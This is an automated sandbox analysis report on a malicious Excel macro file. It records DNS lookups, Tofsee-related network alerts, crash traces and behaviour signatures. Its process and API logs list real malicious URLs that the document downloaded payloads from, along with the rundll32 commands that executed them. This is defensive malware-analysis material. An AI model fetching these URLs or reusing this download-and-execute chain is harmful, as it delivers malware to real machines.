Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 21, 2021, 9:34 a.m.	April 21, 2021, 9:38 a.m.

Size	81.8KB
Type	Microsoft Excel 2007+
MD5	`8d70ebc40f4fdc94aaf8744bdc7879b0`
SHA256	`ff081dce1860cab73c25396463a7865ac837a4b19b3115d86805c356f67fc788`
CRC32	`8ADCD6F9`
ssdeep	`1536:9hvD0tUn/dDuL7QQ64eyZJViW++poHndClu286aYbgBF+iyffn5:9VjwXQQteyZJAW++4dF286aYbgEfh`
Yara	None matched

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\catalog-334041965.xlsm
2388
- rundll32.exe rundll32 ..\xtjxjt.sdfg1,DllRegisterServer
  2044
- rundll32.exe rundll32 ..\xtjxjt.sdfg2,DllRegisterServer
  668
- rundll32.exe rundll32 ..\xtjxjt.sdfg3,DllRegisterServer
  1828
- rundll32.exe rundll32 ..\xtjxjt.sdfg4,DllRegisterServer
  1276

Name	Response	Post-Analysis Lookup
halle-auer20h.ru.com	A 34.86.137.163	34.86.137.163
steilppm.ac.id	A 173.254.61.152	173.254.61.152
deccanrestaurant.co.uk	A 5.100.155.169	5.100.155.169
acienciaparaficarrico.com.br	A 198.50.218.68	198.50.218.68

IP Address	Status	Action
164.124.101.2	Active	Moloch
173.254.61.152	Active	Moloch
198.50.218.68	Active	Moloch
34.86.137.163	Active	Moloch
5.100.155.169	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 5.100.155.169:443 -> 192.168.56.101:49206	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 5.100.155.169:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49204 -> 5.100.155.169:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 173.254.61.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49202 -> 198.50.218.68:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49209 173.254.61.152:443	C=US, O=Let's Encrypt, CN=R3	CN=steilppm.ac.id	c2:89:39:c7:db:96:14:71:78:3a:cd:60:aa:c8:5b:7c:d6:6d:26:5d
TLSv1 192.168.56.101:49202 198.50.218.68:443	C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority	CN=acienciaparaficarrico.com.br	dd:40:e1:d5:ca:24:ca:23:af:57:02:32:2d:b1:7a:5e:fd:85:15:6e

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 21, 2021, 9:34 a.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 21, 2021, 9:36 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x766fd08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x766f964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x766e4d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x766e6f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x766ee825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x766e6002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x766e5fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x766e49e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x766e5a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x773d9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x773f8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x773f8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x75737a25 rundll32+0x135c @ 0xf1135c rundll32+0x1901 @ 0xf11901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x76713ef4 registers.esp: 1897704 registers.edi: 0 registers.eax: 13339008 registers.ebp: 1897732 registers.edx: 1 registers.ebx: 0 registers.esi: 5753624 registers.ecx: 1845638620	1	0	0
__exception__ April 21, 2021, 9:34 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x766fd08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x766f964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x766e4d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x766e6f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x766ee825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x766e6002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x766e5fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x766e49e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x766e5a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x773d9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x773f8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x773f8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x75737a25 rundll32+0x135c @ 0xf1135c rundll32+0x1901 @ 0xf11901 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x76713ef4 registers.esp: 587640 registers.edi: 0 registers.eax: 47810944 registers.ebp: 587668 registers.edx: 1 registers.ebx: 0 registers.esi: 3656472 registers.ecx: 1845638620	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 21, 2021, 9:36 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x766fd08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x766f964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x766e4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x766e6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x766ee825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x766e6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x766e5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x766e49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x766e5a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x773d9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x773f8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x773f8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x75737a25
rundll32+0x135c @ 0xf1135c
rundll32+0x1901 @ 0xf11901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x76713ef4
registers.esp: 1897704
registers.edi: 0
registers.eax: 13339008
registers.ebp: 1897732
registers.edx: 1
registers.ebx: 0
registers.esi: 5753624
registers.ecx: 1845638620

__exception__

April 21, 2021, 9:34 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x766fd08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x766f964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x766e4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x766e6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x766ee825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x766e6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x766e5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x766e49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x766e5a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x773d9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x773f8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x773f8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x75737a25
rundll32+0x135c @ 0xf1135c
rundll32+0x1901 @ 0xf11901
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x76713ef4
registers.esp: 587640
registers.edi: 0
registers.eax: 47810944
registers.ebp: 587668
registers.edx: 1
registers.ebx: 0
registers.esi: 3656472
registers.ecx: 1845638620

Performs some HTTP requests (3 events)

request	GET http://halle-auer20h.ru.com/lenta.html
request	GET https://acienciaparaficarrico.com.br/drms/lenta.html
request	GET https://steilppm.ac.id/drms/lenta.html

Allocates read-write-execute memory (usually to unpack itself) (23 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dc21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dc21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74f41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75241000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75111000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6db31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6db21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dae1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dad1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6da91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6da51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6da31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d9f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d9d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05ea0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 21, 2021, 9:34 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$catalog-334041965.xlsm

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile April 21, 2021, 9:34 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x000003b0 filepath: C:\Users\test22\AppData\Local\Temp\~$catalog-334041965.xlsm desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$catalog-334041965.xlsm create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (4 events)

Time & API	Arguments	Status	Return
URLDownloadToFileW April 21, 2021, 9:34 a.m.	url: http://halle-auer20h.ru.com/lenta.html stack_pivoted: 0 filepath_r: ..\xtjxjt.sdfg1 filepath: C:\Users\test22\xtjxjt.sdfg1	1	0
URLDownloadToFileW April 21, 2021, 9:34 a.m.	url: https://acienciaparaficarrico.com.br/drms/lenta.html stack_pivoted: 0 filepath_r: ..\xtjxjt.sdfg2 filepath: C:\Users\test22\xtjxjt.sdfg2	1	0
URLDownloadToFileW April 21, 2021, 9:34 a.m.	url: https://deccanrestaurant.co.uk/drms/lenta.html stack_pivoted: 0 filepath_r: ..\xtjxjt.sdfg3 filepath: C:\Users\test22\xtjxjt.sdfg3		2148270085
URLDownloadToFileW April 21, 2021, 9:34 a.m.	url: https://steilppm.ac.id/drms/lenta.html stack_pivoted: 0 filepath_r: ..\xtjxjt.sdfg4 filepath: C:\Users\test22\xtjxjt.sdfg4	1	0

One or more non-whitelisted processes were created (4 events)

parent_process	excel.exe	martian_process	rundll32 ..\xtjxjt.sdfg4,DllRegisterServer
parent_process	excel.exe	martian_process	rundll32 ..\xtjxjt.sdfg2,DllRegisterServer
parent_process	excel.exe	martian_process	rundll32 ..\xtjxjt.sdfg3,DllRegisterServer
parent_process	excel.exe	martian_process	rundll32 ..\xtjxjt.sdfg1,DllRegisterServer

catalog-334041965.xlsm

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All